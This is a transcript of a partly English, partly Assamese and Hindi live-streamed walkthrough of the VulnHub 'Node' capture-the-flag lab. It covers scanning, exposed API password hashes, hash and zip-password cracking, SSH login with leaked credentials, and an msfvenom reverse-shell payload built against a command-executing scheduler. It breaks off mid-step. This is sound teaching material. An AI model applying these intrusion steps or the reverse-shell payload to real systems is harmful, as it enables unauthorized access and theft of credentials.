uh, live hacking session. Let me change some settings very quick. Okay, so we have not yet come up with a better name, but if you could suggest us something, we'll definitely come up with an update in the name department. So I think it's safe to start now, seeing as people are joining in more and more. So it is very exciting what we are going to do today. And okay. Okay. Hello everyone. Namaskar soboke. Aji ami ago hacking kora start korim. Pre-hacking stretch korilo. And well, okay. People seem to have joined. Okay. So aji ami olop beleg olop system to beleg korim. And as I said last week that we started this hacking session live so that I could practice CTFs since I seem to have lost the skill with them. And so this will definitely help, hopefully. Okay, namaskar, Gitanjali Mali. Thanks for joining here. Okay, so ami aji eta website hack korim. So it's not exactly a website, it's a CTF with a very, very modern website. Many of you who have done any kind of engineering or computer, if you have learned computer science anywhere at school, at online courses, college also, you have definitely learned the website bor banai PHP, HTML or MySQL. And that has changed drastically by now. And purai change ho goise etia completely notun frameworks ase javascript based hoy gotekhini website. And আজি এটা আমাৰ CTF হাতত আহি পৰিছে যোনটো আমি কমপ্লিটলি এটা মডাৰ্ণ ৱেবছাইট এটা দেখা পাম যোনটো আমি হ্যাক কৰিবলৈ পাৰিম. ওকে, এণ্ড আমি পুৰা ইন ডেপথলৈকে যাম. খালি ৱেবছাইটটো খালি আমি সাইটটো হ্যাক নকৰোঁ. প্ৰথম আমি সাইটটো কেপচাৰ কৰিম, দেন আমি সাইটটোৰ ইউজাৰ নেম পাছৱৰ্ড লোৱাৰ পিছত সাইটটো যোনটো ছাৰ্ভাৰ আছে সেই ছাৰ্ভাৰটো আমি এক্সেছ কৰিম. এণ্ড তাৰপিছত ফাইনেলি আমি আমি ৰুট এক্সেছ লৈ ল'ম. ৰাজু বৰা, ৰাজু দা, হেল্ল' ৰাজু দা, হোপ ইউ আৰ ৱেল. বৰ্তা বৰ্মাক হাই ক'ব. অ'কে গাইজ, লেটছ জাষ্ট ষ্টাৰ্ট উইথ দ্য ছেশ্যন. অ'কে, যোনটো CTF আজি মই ছল্ভ কৰিব ওলাইছোঁ সেইটোৰ নাম হৈছে নোড. Okay, node, and this is the node CTF. You can download it from this link, node 1, or maybe the name is node. Okay, so you have to go to vulnhub.com, vulnhub.com, and search for node. You'll get this one. Download it, just 1.5 GB, not that much. And after that, either use VirtualBox or VMware and start it. Okay, and you will get something like this, and this is all we require as of right now. Okay, and not bad, right? So etia ami first step hol khoday we have to scan a little, right? So network to IP address to pabor karone jonto karone ami prothom root access amar nijor OS to ulabo lagibo. And if you have any question on the way, do put it in the comments, and I'll answer them to the best of my knowledge. Okay, okay, so this is the node CTF. Okay, let's just read the description very quick. Node is a medium level boot to root challenge originally created for Hack the Box. Okay, that is interesting. There are 2 flags to find, user and root flags, and multiple different technologies to play with. The OVA has been tested in both VMware and VirtualBox, so you can either use VMware or you can use VirtualBox. Okay, so I have solved this CTF about 3 years ago. Okay, so Sudeep Kamal Fukan, hello, I am well. Tumhar ki khabar? Okay, so I have solved this CTF, but so long ago, and that was when I had better skills. Now let's see if I still have those skill retained. Okay. Okay, so first of all, ami scan korim. Okay, so for that we have a command which is known as arp scan local. Okay, and we'll get a list of devices on my network. That's a lot of devices, but I'll select the one jehetu my VMware host kori aso. Okay, since I'm hosting it in my VMware, I will select the one jot information at VMware বুলি আহিছে, and এটো IP address to হৈছে 192.168.1.150. okay, I'll take this and মই এটো এতিয়া nmap scan কৰিম. Okay, so I will go with as basic knowledge as possible, even if you have never even been introduced to programming, or if you have not even known what hacking is until this day, I think you will be able to understand it. Okay, and yeah, one more thing, I will make mistakes because I have not seen this, I have not practiced it for today. Okay, I was not home in fact, and you just have to wait a bit patiently if I will make any mistake. Huh? Okay, চলো এতিয়া আমি আৰ্প স্কেন কৰি পেলাই, এজ আই ছেড আমি IP এড্ৰেছটো ওলালোঁ ডিভাইচটোৰ. okay, আমি গেছ কেনেকৈ কৰিলোঁ যে VMware লিখা আছিলে ইয়াতে ন ডিভাইচটোৰ নামটোত. আমি একৰ্ডিংলি এইটো আমি কপি কৰি ল'লোঁ. কপি কৰাৰ পিছত লেটছ জাষ্ট স্কেন ইট ন, nmap -ss -sc -sv 1. লেটছ জাষ্ট পেষ্ট ইট. okay, আমি এতিয়া nmap স্কেনটো কৰিম. অলপ জুম কৰি লৈছোঁ so that you can see clearly. I hope some of my students are also live today, because this will be very useful for everyone. Okay, our nmap result to ahila. Okay, our nmap result has come, and we can see there are 2 ports. Okay, and really good news here. Okay, I'm really excited right now. Okay, so because port 22, which is the SSH, okay, any one of my students will know that port 22 is the SSH port. Okay, SSH port আমি use কৰো যেতিয়া এটা কম্পিউটাৰৰ পৰা বেলেগ এটা কম্পিউটাৰলৈ ডাইৰেক্ট কানেক্ট কৰিব লাগে to use the other computer. So আমি এই ডিভাইসটো definitely আমি if we can connect to it using SSH, we will be able to access that device. Okay, for those of you who are just joining in, we are solving a CTF which is known as Node, and yata eta modern website thakibo which we will be hacking. Okay, first of all ami arp scan di we have found out its IP address, tar bisot ami nmap koriso. That's it, very simple. Okay, so nmap, and then we have another thing here. It is the 3000 port. Okay, TCP port eta amar 3000 খোলা আছে. okay, and ইয়াতে এটা logs এটা ইয়াতে পাইছে /login বুলি. okay, so আমি 3000 port এটা আছে. so HTTP okay, ইয়াতে বহুত ধুনীয়াকৈ আহি গৈছে. see, there is a HTTP title. okay, so when you see HTTP, immediately you remember about this HTTP, right? ইয়াতে যোনটো HTTP আহি যায়. okay, so I think there is a website in this port, and it's possible when you just give the IP address of the website, আমি ইয়াতে IP address লগত এটা পৰ্টটো ডিফাইন কৰি দিব পাৰোঁ, যোনটোৰ কাৰণে সেই পৰ্টটোত এটা ৱেবছাইট হোষ্ট হৈ আছে ছাৰ্ভাৰটোত, আমি সেইটো ডাইৰেক্ট এক্সেছ কৰিব পাৰোঁ. so আমি এটা কাম কৰোঁ, লেটছ জাষ্ট ডু ওৱান থিং, উইল অ'পেন আৱাৰ ব্ৰাউজাৰ, and okay, last week or CTF to etia khula ase. See, this is the proof that I have not done it today, because last week or live video to okay, anyway, so ami ki korim 192.168.1. I think 150 asile, and then we'll give colon and 3000. okay? Let's see. You see, we have a website here. Okay, amar eta website ahi goise. Okay, and okay, login button was, let's just look at the website first very quickly. Tom, okay, some information about Tom. Okay, Mark, everyone's best friend. And okay, login. Okay, so yate login is, but we definitely do not know the username or the password. So well, I guess one of these might be the usernames. Okay, but we have no way of knowing the passwords as well. Okay, so I'm here kaam karo. First of all, just since we have nowhere to go from here, I'll just do the last thing that I usually do, but it is definitely something that you should do first. I'll just view page source code him. Okay, so we'll just view page source and we'll come to the end. Okay, see, okay, I see something. I can see something very interesting. Let me just zoom in. Okay, see one thing here. Can you see this? See, angular.main.js and angular route.main.js. Okay, so this website is not using plain HTML in the front end. It is also using Angular with it. So if you want to know what Angular is, just Google Angular. And Angular is basically a platform that you can just build websites, very dynamic websites. So all of Google's websites are made using Angular because Angular is actually something that Google has built. Okay, so this is Angular. So আমি আজি Angular modern website এটা hack কৰিম যোনটোত Angular use কৰা হৈছে বনাবৰ কাৰণে. Okay, then okay, see this one thing, ইয়াতে আৰু এটা বস্তু আছে, login.js, admin.js, controller some sort of. Okay, so these three seem very interesting here. Maybe we'll just open it in new tabs. Okay, let's just see what's in there. Open link in new tab. Okay, controller, let's just sorry. Okay, so they're getting the names of some information about the users from, so this is a get request. Okay, and we know about get and post request, right? So if you do not know, just go to w3schools.com and that you will find. Okay, so W3 schools, and you can find out what get request and post request is. Okay, just HTTP methods, get versus post. Okay, so getত basically ওপৰতে information খিনি আহিছে, postত ওপৰতে নাহে. Okay, postত অলপ security features to বেলেগ ধৰণৰ হয়. Okay, so that's just about it. তাতকে বেছি নাই to be honest. So I guess you don't have to look. Okay, so API/users/latest এটা আমি পালো. Okay, then ইয়াতে let's just see what is in here. It will give authentication. I don't think I don't think we are going to be able to get anything from here. Okay, API/window.open. It is also not that interesting, but okay, and there was a profile.js also. Okay, see, API/users. Let's just try with this one first. Okay, we'll just try with this link. Okay, now if you did not know what was going on until this moment, this is going to be a revelation here. Okay, at least I feel so. Okay, so I'll just do one thing, 192.168.1.150, and I'll paste the rest of it and I'll press on enter, and let's see what happens. Will something happen? And we had found another one. Yes, this one. Okay, I mean, এই দুইটাই ইয়াতে just লৈ আনিম 192.168.150.3000. Okay, I think I made a mistake in the other one, no? Okay, see, yate ma 3000 to diya nasilo. Okay, Abhishek Kabra, hi. Okay, see, we have, okay, see, I guessed right, see, username and Mark and Rasta Ting. So these are the three users, and there seems to be one admin account. See, this seems to be the admin account. Okay, then there is another one which is the API/user/latest, but I don't think we need all this. I'll just do one thing. I'll take this one, eto korim copy, yate jam loginot tipim. Okay, so if you have not noticed until now, just check how fast this website is. Okay, my place tiplu logge aise 1 second lagane. This is the power of Angular. Angular karone eneko hoise. Modern technologies have made it so fast that this is how fast a website, when you make it using Angular or React or Vue.js, this is how fast it is. Okay, so username to ami paste kore dim. Okay, and I think considering how niche my audience is, how amazing you guys are, I am already damn sure that you know that this is some kind of hash. Okay, so what I'll do is I'll just copy this and I'll go to Google search and see, this is the SHA-256. Okay, so there are tools to decrypt a SHA-256, decode SHA-256 password, but I'll just go the ready-made way and see decrypt korar pisot ami eto password already ulai dise. See, hacking is really not that difficult, to be honest. Jodi Google search the answer ahi ase. See, Manchester. Okay, so we already know the password of the first admin, in fact, the admin user. So I'll just close these, since we do not seem to require these anymore. Okay, so here you can see we have this password. Okay, so mata kaam karo. I don't know if I can edit this. Can I edit this? Okay. No, I cannot edit this. Chalo, koi baat nahi. I'll just save it in a text. Text edit thing. New document. This is the etu mane hol Manchester, no? And let's just copy this as well. Okay, so ami prothom tor ami password to pai golo. Okay, Manchester hoy. Okay, tar bisot ami eta kaam koru eketa ulai diu ekelage Tomor password to ulwa chesta koru. Eto koru copy and yate korim ami paste and search korim SpongeBob. Okay, chalo. Okay, this part is actually pretty easy. So this is Tom ka password. Okay, then Mark or password to lum. We are cracking passwords here, ladies and gentlemen. Okay, so my Delaware website tipe dilo bhulode. I really wish I could say that today's episode was sponsored by Dell, but no. So ami car password crack kori asilo eto Marker. Okay, Marker. So Mark Snowflake. Okay, we have already cracked 3 passwords till now. And then Rasta Tinger ami edu koru copy and ako yate korim ami paste. Most ridiculously easy thing in the world to be honest, and they were claiming it to be medium. क्या यार, चलो कोई बात नहीं. Okay, to answer নাপালে, okay, maybe it is medium. Okay, so anyway, like ৰাস্তাটিঙৰ ইয়াতে এটা আছিলে ন বেলেগ লিংকটোত API/user/latest. Are these the same ones? No, they are not the same, right? Okay, ইয়াতে ৰাস্তাটিঙৰটো আমি কৰোঁ কপি, ইয়াতে কৰোঁ আমি paste and koro search. No hashes ba rastating or password to ulabo para nai. Okay. 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 So I think ho jabo. Yeah, we found the password of many people until now. Okay. Manchester, SpongeBob and Snowflake, right? So I made a काम करो. We had already until now we have already wait a second, is there something wrong with the internet? Okay, yeah, everything seems fine now. Okay. So guys, the network connection problem hai, definitely tell me immediately. Okay, so আমি এতিয়া এটা কাম কৰিম which is known as hacking into the account, and আমি এইটো লগ ইন কৰিলোঁ. ইয়াতে এইটো আছে, and passwordটো do you remember? It was Manchester. Okay, so এইটো আমি কৰিম copy and ইয়াতে কৰিম আমি paste and login. Okay, login হৈ গ'ল actually, so don't save. Welcome back admin, download backup. Okay, they have saved some sort of okay, they are making me download something. Okay, so eto moi kholim etia, and eta myplace.backup buli file eta ahise, so I'll click on it. Open with mousepad. Okay, azikali mousepad text editor diye Kali Linux or logot. Let's see if they open it. No problem, they did not open, right? So open with Vim Radio. Oh my god, what the okay, let's just ignore that. Okay, so Vimedi open code though, it has opened something. Okay, wow, it's making some noise also. No problem. Okay, wow, this is just I honestly have I probably have no idea what this is. Okay, let me just see. Is this okay, I'll just do one thing. Etu moi terminal khulilo na ta beshi bhal hobo. So cd/home/downloads. Okay, ls eto, so ami koru cat myplace.backup. Oh wow, okay, see, yata the hint ase. I'll give you one hint that is going to be helpful for you in all of your CTFs. If you see something that is insanely long, okay, I had my suspicions and I think I am right about this. If you see something that is insanely as long as this one, which is clearly just like too long, and at the end if you see this equal sign, okay, so I don't know if you can see the equal sign. Here is the equal sign. Okay, here is the equal sign. This is probably base64 code. Okay, base64 code ot khodai last ot eta ba duta, usually duta, but ketiaba etao thake, duta equal sign thake. Okay, so I'll give you one more hint. Ketiaba etao equal sign na thake, just ene ebar base64 decode kori sabo lage. Okay, so etia eta equal sign ase jehetu this is a clear cut sign. Okay, I'm almost 100% damn sure ki this is definitely a base64 hash. Okay, যোনটো ফাইল আছে আমাৰ এইটো base64 খুমাই ৰাখিছে. সো আমি এটা কাম কৰি দিও, এটো আমি কৰো ls এই ফাইলটো আছে ন উইল জাষ্ট আমি বেছ 64 টো আমি ডিকোড কৰি দিওঁ অ'কে চ' কেট মাই প্লেচ ডট বেকআপ এণ্ড বেছ 64 ডিকোড কৰা কমাণ্ড লিনাক্সত ইনবিল্ড এটা থাকে which is I think base 64 yes base 64 decide no sorry decode and আমি এটা ফাইলত ভৰাই দিওঁ my place let's just name it my place okay বেলেগ একো নকৰোঁ my place dot decoded ls so এটা my place dot decoded বুলি ফাইল এটা আহি গ'ল okay and let's just এবাৰ cat কৰি চাওঁ my place dot decoded okay এতিয়া কিবা একো বুজি নোপোৱা টাইপ আহি গৈছে okay so no problem একো নাই আমি এইটোৰ কাৰণে এটা লিনাক্সত আমাৰ we have every solution in linux to be honest so as you say এইটো আমাৰ অৰিজিনেলটো আছিলে আমি সেইটো ডিকোড কৰিলোঁ বেছ 64 ডিকোড কৰিলোঁ now what we can do is we can just find the file type okay we can just find the file type of the this thing okay decoded code okay so I'm calling file just that's it okay file my place dot decoded zip okay so this is a zip file okay to eta kaam koro we'll just rename it na zip file like and then ami unzip kori lobo parim so file no sorry hey rename koribo karone command hol mv my place dot decoded and we'll change it to my place dot decoded dot zip and now amara duta file ase eta zip file etu executable permission nai so chmod plus x my place dot decoded dot zip plus x korilu and eta ami korim unzip everything is so simple as of right now any question just comment immediately okay so unzip my place dot decoded dot zip so eto password protect kori rakhise do you think it's one of these passwords what are the chances I'll just copy this copy paste okay and incorrect no problem amar aru duta password ase copy paste okay no problem ami korim eto copy to korim paste okay so eto nai hua so let's just crack the password okay we'll just crack the password of this also so we need one tool let me just see if it is there which f crack zip not found okay f crack zip is not there okay we'll just install it okay so we'll go to Google yeah this one okay. So we'll just come here f crack zip it's a very simple tool for some reason agote Kali Linux ot thakisile and it just does not seem to be here anymore should we just try one thing let's just apt-get no f crack zip okay that was really easy okay so one more step okay hoi gol amar eta ami korim eto ami পাছৱৰ্ডটো আমি জিপ ফাইলৰ পাছৱৰ্ড ক্ৰেক কৰি আছোঁ অ'কে অ'কে বঢ়িয়া এফ ক্ৰেক জিপ এতিয়া আহি গ'লনে -v যদি দি চাওঁ हाँ ओके कोई बात नहीं ओके इट इज़ वर्किंग ओके सो एफ क्रैक जिप -d आई थिंक -p दिले हो যাব एंड -p माने पासवर्ड्स खिनि ओके सो स्लैश यूजर शेयर wordless rockq.txt আমি rockq.txt to use karim okay so we have a file so this thing right there is a file with 1.4 crore password almost 1.5 crore password combinations okay so hey password list khonor pora ami probably eto crack koribo parim নহলে আমাৰ আৰু লিষ্ট আছে we'll find out the password no matter what okay so আমি কৰিম my place dot decoded dot zip to okay this is just that was oh my god that was suspiciously easy so the password is magic word okay and x2nd dot fcrack zip guys I recommend fcrack zip okay just awesome tool x2nd dot password tool okay so আমি কৰিম magic word to copy and আমি we'll just open the file downloads open folder eto korim double click so we'll just or what we can do is we'll just extract here password khojibo ami password to de dim okay hoy gole to this okay they did not show anything chalo koi baat nahi we'll just cd oh wait I don't know I think this is the one that came out of it no I think there is some confusion I'll just do it once more okay I'll just remove both of these files bye yes to all directory not wow just to remove the confusion I'll do it once more okay so I'll just ls yate see two more files have come no so rm minus rf va star okay and ami unzip my place of decoded dot hey eto kori ami paste aru enter and ls see yate eta notun folder ahi goise var boli okay so etu jeti ami unzip korisu tare pora var boli folder eta ahi goise juntor bhitorot we have more stuff okay yate we have a okay we have a lot of files chalo koi bane ami eto amar terminal or pora khulim no problem we actually have a lot of files okay so ami cd var my place ls so ami koro less app.js karon gutehini code jehetu js ote thake oh ami password eta pai golo and this does not even look like hash this looks like a password no okay this is not a hash this is too short to be any kind of hash or encryption I think this is the password of mark okay so if you are confused by what's happening here this is just the code that okay will not go that below but I'll do one more thing I'll copy this and our password ekhon list ami banai asilo na copy selection ekhon আমি ইয়াতে এটো পেস্ট কৰি দিম and so I'll just quickly explain what is happening here this is the code for the backend okay eto backend server jonto soli ase server code to tama login koribor karone ei page khon use hoy ase this page of code okay and backend or pora hoda database ot gutehini bostu jiman everything that you can see Suppose let's say the information about this video, your usernames, passwords, everything is stored inside the database, obviously. Okay, and we have direct connection to the database here. So a line to jodi ami di dio database to ami connect koribo parim directly. Okay, and this is the username and password of the database. Ami username o jano, password o jano. I'm thinking one thing. If I just do you remember our Nmaps cannot SSH ulaisile. So what I'm wondering is if we can log in to the SSH using this username and password. Okay, so just that's why what you should do is take a pen and a notebook and keep noting down everything that is happening right now. In Nmap found these ports, and this is the IP address. So just note down everything on a piece of paper when you are solving the CTF. You will be able to remember it quickly. Okay, just in case you don't have a good memory like me. Okay, so I'll do one thing. Okay, so I'm calling SSH. Mark @192.168.1.150 enter. আমি কৰিম yes SSH ত এটো দিয়ে কানেক্ট কৰিব লাগে সদায় ঠিক আছে এডি কানেক্ট কৰিব লাগে using this one okay and আমি কৰিম yes permanently and password to আমি দি দিম এটো copy selection and paste selection. Oh guys, just have a look at this. I think we are in the okay, we are in the server now of the website. Congratulations. That was actually not difficult, to be honest. Do you find it difficult? Just tell me in the comments if you do. Just let's take a quick poll. How many of you actually find it difficult until now? Like just say yes or no is good enough. Let's see. Or like if you find it easy, don't comment. If you find it difficult, comment. Or both or the opposite of that. I am so confused right now. Kibara korile hola comment korida kibara. Okay, so okay, we have control over their user. See, mark @node. Node is obviously the name of the system. Server to naam to definitely node hai, and we have logged in to the user whose name is Mark. Okay, ami Markok ami hack koriso. Ami Markor username aru password to ulai pelai ami we have found out some information. We have actually found out how to log into his system. Okay, so আমি এতিয়া অলপ এটো মানে এটো খুচৰা স্বভাৱ এটা থাকে ন হ্যাকারছৰ so আমি এটা অলপ খুচৰিম প্ৰথমতে ls মাৰিম একো নাই who am I Mark obviously pwd okay and then আমি id মাৰি চাম 1001 okay so আমি obviously root নহয় root হলে এটো থাকিলে হয় 0 okay so id হল 1001 ঠিক আছে হ'ব so আমি /home/markot আছে cd dot eta mari saw or ls mari saw we have 3 users. Let me see if you can see it clearly. Okay, so ঠিক আছে আমি ls mark যেতিয়া কৰো এটো ফোল্ডাৰৰ ভিতৰত একো নাই so there is nothing. আমি কৰো ls frank. okay ইয়াতে এই দুটা ফোল্ডাৰ খালি আছে দেখোন তিনটা ইউজাৰ কৰি কি লাভ তেনেহলে okay ls tom এটো খালি থাকিলে okay so this is not খালি okay this is not khali so we'll go to cd tom ls user.txt. This might be the first, this seems to be the first flag. Okay, so do you remember they said ki 2 flags, user and root flags. Okay, so this might be the user flag. okay, so আমি দুখন ফ্লেগ যদি আমি এক্সেছ কৰিব পাৰোঁ আমি জিকিলোঁ, okay. So Miki Hazarika says no. Hopefully you said no, this is not difficult. If you find it difficult, we'll explain it to you, no problem. Okay, but thanks for commenting. So I'm here to call him cat and user dot txt and I'm permission denied. Why is the permission denied? Okay, let's just do one thing. ll user dot txt. So Tom is the one, okay. So everyone, okay, Tom, you need to be Tom to be able to read this, or Ruth. Okay, আমি হৈ আছো Mark, no? The username has to be changed from Mark. So who am I? যদি আমি চাওঁ, we are Mark but we want to be Tom. A life or dilemma হয় এইটো, মই কোনবা হয় কিন্তু বেলেগ কোনবা হ'বলৈ মন যায় না। চলো कोई बात नहीं, we need to be Tom. Let's just think how to become Tom now. Okay, any ideas, anyone? I think we can find something here. Yate to bele ko nahi dekhun. Cat app.html. Remember this? JS Angular. Okay, I wonder if we can find something here. cd static. Okay, I don't think আমাৰ যোনটো আমি কোডটো ডাউনলোড কৰিছিলো ন ইয়াৰ পৰা, the code that we downloaded from this admin page, not admin, some kind of user page. I don't think we have the solution in this one. So আমি এটা কাম কৰিব পাৰো ইয়াতে, let's just find out what are the things that Tom is running. Okay, so if you remember last week when we solved the CTF, Mr. Robot CTF, what we did was আমি চাইছিলো যে root user টোৱে কি tools run কৰি আছে, and তাৰে tools এটাৰ পৰা, তাৰে কোনবা এটা toolৰ পৰা আমি vulnerability উলাই পেলাই আমি হেইটো hack কৰিছিলো, হেইটো use কৰিছিলো to hack it. Okay, so maybe আমি হেনেকুৱা পাই যাম. So there is a command for that which is known as Tom. Tom no, top. Okay, top. See, you can see everything. So basically I'll show you what top is. Have you seen the activity manager? Control Alt delete marile je tate activities or ekhon list ahi jay no. So Linux ot he Control Alt delete marile junkhan bostu khan ahe Windows ot he bostu to amar top command to ahe. Okay, khali eto this is becomes just too much, so I'll just show you once more. Yes, top marile, you can see everything that is being run, okay, by different users. So root e besibhag bostu cholai ase, but I am sure korobat Tom eta paisilo yate. So eta kaam koro, okay, I'll show you one more trick. Okay, like smart hacks. Okay, so ami korim top top and grab Tom. So junketa line ot Tom শব্দটো আছে, Tom wordটো আছে, সেই গোটেইকেইটা লাইন আমাক দেখাই দিব. Okay, top grab Tom. Okay, নাই নেকি? Okay, no problem, there is one more command. Okay, ps aux. Okay, enter my. Okay, yato bahut bostu ahi goise eko nai, it's kind of a similar command. Okay, don't worry. So ps aux grab Tom. Okay, see, টমে দুটা বস্তু চলাই আছে ফাৰ্ষ্ট ওৱান ইজ দিছ okay so when I come ps aux grep tom okay tome eto app.js cholai ase which was clear from the beginning I guess and this thing scheduler dot node cholai ase thik ase node.js so tome cholai ase and scheduler slash app.js এই বস্তুটো চলাই আছে tom user to okay this is being run by tom user okay so আমি এটা কাম কৰো ন এটো কৰো আমি copy and কৰো আমি cat and এটো paste কৰি দিলো and see we have some sort of code here set interval db.collection tasks find dot to array function error comma docs okay for each functions doc delete one okay execute koryo doc.cmd2 tapisot just give me 1 second I'll explain it to you let me read it first else if error console.log something went wrong and 30,000 30 seconds or more okay so I have understood this code okay and it's a very simple thing so I'll just do one thing less and so it to command this sum okay so this is mostly node.js ka code okay javascript or code hai node.js olop ase ate okay bele eko nai bhoy koribo laga eko nai bahut easy code hai once even though it might look ki oh my god bole ke likha ase just give me 1 minute to explain it to you and you'll understand that this is as easy as well so many other things okay so okay so the trick that I use to understand code is I read it as if I'm reading English okay even though it's some sort of coding language but English পঢ়াৰ নিচিনাকে পঢ়িলো okay so obviously yate exact মানে child process dot exact যোনটো হয় obviously it's for some execution of some sort of code okay then there is the mongo client যোনটো mongodb connect কৰিব কাৰণে obviously object id etu kiba hobo kisani even I don't know what it is and url etu to this we found no if you remember we found this is the mongodb connection ka the one that you need okay okay so mongodb ami database ot connect koribo karone we need this one okay so mongo client.connect url eto ami buji paiso so this code is used to connect this code okay ei amar ei program to tar mane ei software to amar mongodb database lot connect koribo karone ami ekhini use korisu bile eko nai it's just so simple just eto okay etu bujibo eko na lage this is just very clear obvious mane okay then there is the set interval function jonto probably hobo amar yate dia nai jehetu this is definitely there in javascript okay you can't remember everything of programming even I don't but I'm guessing here and I'm pretty sure I'm right here okay so set interval ki kori ase db.collection okay so okay I'll just explain one thing to you here MySQL we have tables and we have columns okay so it's very sensible right ami data store kori asu MySQL khon register nisina hoy okay just imagine one register any register that your school teacher used to have tate sob students er naam thake roll number 1 or 50 leke and sob student tore date to por likha thake are you present on his date or not okay let's say 4 tarikh hai chintoe absent kori dile ke absent korile ta kapur letter hoy goisile okay so hi aha nasile heto karone and tate absent boli meme mark kori dibo ronga pen di aru baki sobake p for present di dibo heneke eto ami ki kori aso columns aru tables use korisu na tables and columns use kori aso this sort of thing is the MySQL database একদম ৰেজিষ্টাৰৰ হুবহু কপি হয় ওকে MySQLত হেনেকুৱা হয় MongoDBত অলপ বেলেগ হয় MongoDBত টেবলছ আৰু কলমছ নাথাকে MongoDBত কালেকশ্যনছ আৰু ডকুমেণ্টছ থাকে ওকে কালেকশ্যনছ আৰু ডকুমেণ্টছ সিম্পলকৈ যদি বুজাব যাওঁ টেবুলৰ জাগাত কালেকশ্যন থাকে আৰু কলমছৰ জাগাত ডকুমেণ্টছ থাকে বছ ইতনা সা ওকে ভেৰি ইজি ওকে চ' db.collection এটা আছে ডেফিনেটলি টাস্ক বুলি ওকে যোনটো আমাৰ ডাটাবেছ আছে তাৰে টাস্ক বুলি এটা কালেকশ্যন আছে ডেফিনেটলি তাতে ফাইণ্ড কৰা তাৰমানে give me all the data that is there in the collection বা table যোনটো হয় task বুলি কালেকশ্যনখনত যিমান ডাটা আছে give me all the data and সেইটো এটা এৰেলৈ কনভাৰ্ট কৰি দিয়া ঠিক আছে চ' কাইণ্ড অফ টেবল টাইপকৈ আহিব তেতিয়া আমাৰ অ'কে এৰেলৈ কনভাৰ্ট কৰিলে মই কৈ আছোঁ কেনেকৈ আহিব একজেক্টলি আই কেন শ্ব' ইউ একজেক্টলি হাউ ইট উইল কাম এনেকৈ আহিব যিমানখিনি ডাটা আছে আমাক এনেকৈ দেখাই দিবহি অ'কে এনেকৈ দিছ ইজ হাউ ইট উইল বি শ্ব'ন অ'কে চ' এই ক'ডটোৱে বেচিকেলি সেই কামটো কৰি আছে চ' আমাক এইটোৱে কৈছে যে যিমানখিনি ডাটা টাস্ক বুলি কালেকশ্যনখনৰ ভিতৰত আছে সেইখিনি মোক ইয়াতে দেখাই দিয়া ক'ত দেখাই দিয়া মোক এৰে টাইপকৈ মোক দেখাই দিয়া অ'কে সি এনেকৈ দেখাব এণ্ড দেখুৱাৰ পিছত যিমানটা ডকুমেণ্টছ ফৰ এইচ অ'কে যিমানটা ডকুমেণ্ট আছে যিমানটা এণ্ট্ৰি আছে মানে কালেকশ্যনখনৰ ডাটাবেছত যিমানটা বস্তু আছে আমাৰ সেই কালেকশ্যনটোত সেই প্ৰত্যেকটোত প্ৰথমতে কৰা এক্সিকিউটিং টাস্ক বুলি কনচোলত লগ কৰা এণ্ড তাত এটা CMD বুলি এটা থাকিব অ'কে আই থিংক আই শুড ড্ৰ ইট ন আই শুড আই ডোণ্ট নো ৱেৰ অ'কে জাষ্ট কুইকলি ড্ৰ ইট on my notes and I'll show you what is happening so you will understand so what is happening is we have the task and tare bhitor amar ase eta CMD bhitor kiba eta command ase bas eto okay let me see if you can see it properly on the monitor okay can you see it okay this one okay so eneke amar bostuto ase bele eko nai taskor bhitorot command boli ase and hey command to ami execute koribo lage I lost the pen okay bas it's very simple it seems very simple until now okay and then there was a delete kori diba that was really careless of whoever developed this website because what they're doing is database or pora eta command loise and hey command to he execute kori ase every 30 seconds or more okay I'm not sure how well I'm explaining it but this is what's happening okay I'll just share everything one more time okay and listen very very carefully okay set interval of 30 seconds okay so you know like military speak out 1 second of 1000 bully koi no 3000 2000 1000 okay so 30000 mane 30 seconds okay and so set an interval of 30 seconds in that 30 seconds what you have to do is find a collection jahan pe jiska naam hai tasks tare data khini loa and tate junto CMD ase he CMD to execute kori dia thik ase junto CMD argument ase he argument no hai sorry CMD junto ase no CMD document khonor pora ami heto execute korim junto je likha na thakok kya okay if you have not understood it I'll explain it to you once more just you need to comment it there okay so aru hetu korar loge loge they will delete that one okay they will delete the command also okay that's what they are doing this is basically everything here okay all of complex hai I wish I could have explained it a bit better to someone who has no background in programming, but chalo koi baat nahi, you will understand once we execute this. Okay, so all I need to do is insert insert mongo in MongoDB CLI. Okay, so আমাৰ এটা command লাগে যোনটো honestly মোৰ মনত নাই. I really do not remember it. এইটো db.collection.insert এইটো কৰিলে হৈ যাব. Insert এইটোত বহুত কেইটা কৰিব লাগিলে. I think there is one more insert one এটা থাকিব. EFGHI insert one. Okay, we'll use this one. db.collection.insert one. This is what we will use. Okay, we'll just use this one, no problem. Aram se ho jabo eta. Okay, so etut ki use korim. See, just imagine the opportunity that we have been given here. We are inside the user. Okay, we are already inside the user, and what we need to do now, আমি just তাই কাম কৰিব লাগে. আমি কিবা এটা এক্সিকিউট কৰি দিব পাৰোঁ. ৱেবছাইটটোৱে আমাৰ কাৰণে এটা বস্তু এক্সিকিউট কৰি দিব যি খুজো. আমি জাষ্ট ডাটাবেছত ভৰালেই হ'ল কি এক্সিকিউট কৰিব লাগে. বাছ. Okay, this is like everything that you could ever want in a CTF. Okay, so what we are going to do now is এইটো ৰাখোঁ, আমি ইয়ালৈ আহোঁ নতুন টাৰ্মিনেল এখনত, and আমি I think we should just make one আমি এটা চেল বনাওঁ ন. অ'কে, উইল মেক ওৱান, আমি এটা ৰেট এটা বনাই দিওঁ, ঠিক আছে. আৰু আমি সেইটোৰ কাৰণে ইউজ কৰোঁ MSF Venom. অ'কে, চ' MSF Venom -p -p bashৰ কাৰণে আছিলে আই থিংক cmd/unix/ bash. Guys, if I'm doing this one wrong, then do correct me. Okay, cmd/unix/bash. Okay, then lhost মই নিজৰ IP এড্ৰেছটো ওলাই লওঁ. (144). Okay, lhost equal to 192.168.1.144, and এইবিলাক সদায় চেক কৰি ল'ব লাগে যেনেকৈ মই এইটো মাত্ৰ ভুল হৈছিলে. lport equal to 1337, hackers number. Okay, -f raw, and we'll put it in a file exploit.sh. এইটোৱে নাম দিব ভাল লাগে. আমি এতিয়া আমাৰ মেচিনটোৰ পৰা আমাৰ যোনটো মেচিনত আমাৰ কণ্ট্ৰল আছে ন এইটোত, অ'কে, এইটোলৈ আমি লৈ আনিম. আমি কিউট দি দিওঁ. অ'কে, ইয়ালৈ এই ফাইলটো লৈ আহিম. চি দিছ ফাইল. অ'কে, ls, this is the exploit.sh, no? Okay, I'll teach you one shortcut to take this. You probably know this. Okay, but let's still do this. I'll just copy this. Okay, not like this. cp exploit.sh, then we'll go to /var www html, and ইয়াতে save কৰি দিওঁ. Okay, and 